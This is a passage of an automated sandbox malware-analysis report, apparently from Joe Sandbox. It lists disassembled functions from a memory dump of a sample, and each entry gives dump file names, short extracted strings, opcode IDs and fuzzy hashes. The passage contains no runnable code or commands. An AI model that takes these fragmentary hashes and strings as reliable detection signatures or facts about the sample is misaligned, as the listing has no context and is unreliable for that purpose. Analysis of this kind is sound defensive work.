                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: %*+(
                                                      • API String ID: 2994545307-3233224373
                                                      • Opcode ID: a2366d100a89d544fdc023435bb2834c81e393c52860f09014fbf1f4fb5d0fd0
                                                      • Instruction ID: 653bec6eb088cd4e3144125407c485a92b87c97b9509b3ed902eb659355e0b6b
                                                      • Opcode Fuzzy Hash: a2366d100a89d544fdc023435bb2834c81e393c52860f09014fbf1f4fb5d0fd0
                                                      • Instruction Fuzzy Hash: AFB1CB70A083019BD714EF58D891B3BBBE2EBA6740F14492CE5C98B251E335EC55CBD2
                                                      Function 001DFC20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: dcb902b38b306c5e61ebd5b23489875c37dbdb66591c9b6f54fd5eeb4db78659
                                                      • Instruction ID: d7144a9862e9641accf0f7ef43d78d7beb61c969bab69d05361e6f48629b5b83
                                                      • Opcode Fuzzy Hash: dcb902b38b306c5e61ebd5b23489875c37dbdb66591c9b6f54fd5eeb4db78659
                                                      • Instruction Fuzzy Hash: 1581FE71118300EBD714EF69D884B2EB7E6FB99701F54882DF2C687291D730EA56CB62
                                                      Function 001BD457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: fab207f03032b3860e3c7e7df3bd57ecb737f1785f6a7ecb0fa46791a9734951
                                                      • Instruction ID: 22e3e999d1f0acab5be48d69c048df18b015a8f471c51f174dc8e5d73c9d35a7
                                                      • Opcode Fuzzy Hash: fab207f03032b3860e3c7e7df3bd57ecb737f1785f6a7ecb0fa46791a9734951
                                                      • Instruction Fuzzy Hash: 2361C2B5908204DBD725EF58EC42ABAB3B1FF95354F480928F9858B252F731E950CB92
                                                      Function 004581B4 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V|N
                                                      • API String ID: 0-2241778045
                                                      • Opcode ID: 0a1f4b5f3e0ffce081e13d95721619671c90d9e08eb01841e8aa4b62aee051b8
                                                      • Instruction ID: 800f0ae5e7358f2b0ee1d75eca481caaae585a2146703c8b4feed67f65b72f2f
                                                      • Opcode Fuzzy Hash: 0a1f4b5f3e0ffce081e13d95721619671c90d9e08eb01841e8aa4b62aee051b8
                                                      • Instruction Fuzzy Hash: E29156B2508709DBDB208F28C84436EB7A1EF44312F19452EDD8167782DF3A5C59CB8E
                                                      Function 001E4A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: 628e9bdae0ea3953ae44b4e2e24d9eca1120c71968e9817eff17351320378a7d
                                                      • Instruction ID: 087d1f0323025d3b656c2391af537da479464f696ec38a709af26b203ac8f0ba
                                                      • Opcode Fuzzy Hash: 628e9bdae0ea3953ae44b4e2e24d9eca1120c71968e9817eff17351320378a7d
                                                      • Instruction Fuzzy Hash: 2061DF71A08B819BD724DF26C880B3EB7E6EBC4314F69891CE9C987291D771EC50CB52
                                                      Function 0021138F Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Wvk
                                                      • API String ID: 0-500042981
                                                      • Opcode ID: 7a3b6c3f4e2ef744bcd9d1e8329fa01462a167753e04a938f913a081f769139c
                                                      • Instruction ID: 4e1b3e38928bfcbc82a283685b0dac3df68e69811b51a8b40f23248d4c4ae645
                                                      • Opcode Fuzzy Hash: 7a3b6c3f4e2ef744bcd9d1e8329fa01462a167753e04a938f913a081f769139c
                                                      • Instruction Fuzzy Hash: D7513AF3A043149BE3042E2DEC857BAFBE9EB94720F1B453DDBC993380D97948048696
                                                      Function 00453701 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V|N
                                                      • API String ID: 0-2241778045
                                                      • Opcode ID: e471cbf1473a472cab0733bae514e9b6c80396bc48807e435678f2adcdbae9b7
                                                      • Instruction ID: 29f0bba2651ceaa6c63fb0ff4fe121a0af1c90d6c10275e616ee6d32fb4c6382
                                                      • Opcode Fuzzy Hash: e471cbf1473a472cab0733bae514e9b6c80396bc48807e435678f2adcdbae9b7
                                                      • Instruction Fuzzy Hash: AC5129B250C619DBD7009F18C88026AB7E1FF54352F26452EDDC567701EE396C1ACB8B
                                                      Function 001AE1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 001AE333
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                      • API String ID: 0-2471034898
                                                      • Opcode ID: 3f0af2c9a92f269b62dd45afc35d29d8404ec1d56602ac80afe6adbfa5dae59a
                                                      • Instruction ID: 6978fb59081526328c0e7cfe40635a7afc5e9ffd2cdb13a30e636d0395f219bf
                                                      • Opcode Fuzzy Hash: 3f0af2c9a92f269b62dd45afc35d29d8404ec1d56602ac80afe6adbfa5dae59a
                                                      • Instruction Fuzzy Hash: A651472BA196D04BD329897C5C913AA7AC70FE3334B3EC36AE9F18B3E0D65548018390
                                                      Function 004581AA Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V|N
                                                      • API String ID: 0-2241778045
                                                      • Opcode ID: 8aea4921c0747cf32fe84f18318eb8b0b962531257731fe981f3e2e34a886efd
                                                      • Instruction ID: 7c0c9af42de7fecfe64a1a21edf3be93093511e12c2f94d9a1613cedf4b5eb17
                                                      • Opcode Fuzzy Hash: 8aea4921c0747cf32fe84f18318eb8b0b962531257731fe981f3e2e34a886efd
                                                      • Instruction Fuzzy Hash: 755105B250C619DBC7009F18C88026ABBA1FF54352F26452EDDC567742EF396C1ACB8B
                                                      Function 001E3920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: f9f2fe64779dc5098185f905a3d5b7c971b45aba4fdefa8759d7dd201b495f90
                                                      • Instruction ID: 03ee724524c57426444d14d1831c2b77cf1aba79ea175429684c9fd331b8c238
                                                      • Opcode Fuzzy Hash: f9f2fe64779dc5098185f905a3d5b7c971b45aba4fdefa8759d7dd201b495f90
                                                      • Instruction Fuzzy Hash: E3518274509A809BCB28DF16D888A2EB7E6EFC5748F14892CE4D6C7251D371DD90CB62
                                                      Function 001B1BEE Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L3
                                                      • API String ID: 0-2730849248
                                                      • Opcode ID: ede385e28036497ff3209f5bd5aa0a46bca5607f855aef1dc439357f54857a22
                                                      • Instruction ID: 6fdfa1bdc217596de2cd9e31256d541972c865c16137d90fc7edf995019e57f1
                                                      • Opcode Fuzzy Hash: ede385e28036497ff3209f5bd5aa0a46bca5607f855aef1dc439357f54857a22
                                                      • Instruction Fuzzy Hash: D54152B4008380ABC7149F64C8A4A6FBBF0BF86314F44891CF9C59B291D736C905CB56
                                                      Function 001DFF70 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: fb7967dda5ca3e5209490f5e949c397dbfd94e5019d232de6d68875e2188af9f
                                                      • Instruction ID: fa93f6908be385e39ee69d76049b0147de2a9f8f0715eae072493decbc689df0
                                                      • Opcode Fuzzy Hash: fb7967dda5ca3e5209490f5e949c397dbfd94e5019d232de6d68875e2188af9f
                                                      • Instruction Fuzzy Hash: 773126B1A04781ABD711EE56DC81B3FB7E9EB99784F540828F88587252E371DC50CBA3
                                                      Function 001CE40C Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 72?1
                                                      • API String ID: 0-1649870076
                                                      • Opcode ID: 642fe2d658da19f8aaffe620af31df2add0ba78868c31d845760e83323c5099b
                                                      • Instruction ID: 2a2349d9b45d82b553606439466cdeacb743d143aa97a38e051e9b90529987be
                                                      • Opcode Fuzzy Hash: 642fe2d658da19f8aaffe620af31df2add0ba78868c31d845760e83323c5099b
                                                      • Instruction Fuzzy Hash: ED31BFB5A00344DFCB20CF95E880ABEB7F4BB2A304F14042CE446A7601D335EA44CBE2
                                                      Function 001B6F91 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000200000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.000000000048A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813461032.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813695515.0000000000499000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813817844.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1813835246.000000000062D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %*+(
                                                      • API String ID: 0-3233224373
                                                      • Opcode ID: 4e3e75164dcc289abcff22aa021ff8f665e9dd982140c73bb88a4e31eeede975
                                                      • Instruction ID: b66b95b372df1e5b56403b4d7511f7b8f9631a3b9be75844a28aafd73ec5d442
                                                      • Opcode Fuzzy Hash: 4e3e75164dcc289abcff22aa021ff8f665e9dd982140c73bb88a4e31eeede975
                                                      • Instruction Fuzzy Hash: 6D414675605B04DBD7349F61C994B26BBF2FB4A705F64891DF6869BAA1E331F800CB10
                                                      Function 001CE66A Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1813421570.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                      • Associated: 00000000.00000002.1813397131.00000000001A0000.00000004.00000001.01000000.00000003.sdmpDownload File
